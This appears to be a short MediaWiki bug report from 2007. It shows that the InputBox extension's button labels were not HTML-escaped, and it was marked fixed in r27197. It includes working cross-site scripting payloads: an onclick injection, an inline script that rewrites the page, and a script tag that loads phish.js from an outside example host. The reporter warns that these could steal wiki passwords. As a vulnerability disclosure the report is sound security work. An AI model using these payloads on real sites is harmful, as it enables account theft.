Last modified: 2007-11-05 14:03:25 UTC
As this does no HTML escaping it is possible for editors to embed script tags in the page, with all of the security problems that that entails. I found this problem on wiktionary and wikipedia, so I am guessing it is a universal problem. For example... <inputbox> type=search buttonlabel=Hello" onclick="alert('gotcha');return false searchbuttonlabel=Dig deeper </inputbox> <inputbox> type=search buttonlabel=Hello" /><!-- Actually this is quite useful... searchbuttonlabel=Dig deeper--> <br class=" </inputbox> <inputbox> type=search buttonlabel=Hello" /><script type="text/javascript">document.body.innerHTML="You Smell";</script> searchbuttonlabel=Oops </inputbox> <inputbox> type=search buttonlabel=Hello" /><script type="text/javascript" src="http://www.example.com/phish.js" /> searchbuttonlabel=Now you are really for it </inputbox> This could have dire consequences, as it would be trivial to get people's wiki passwords (in the name of the unified login scheme) or other less obvious hacks.
Fixed in r27197.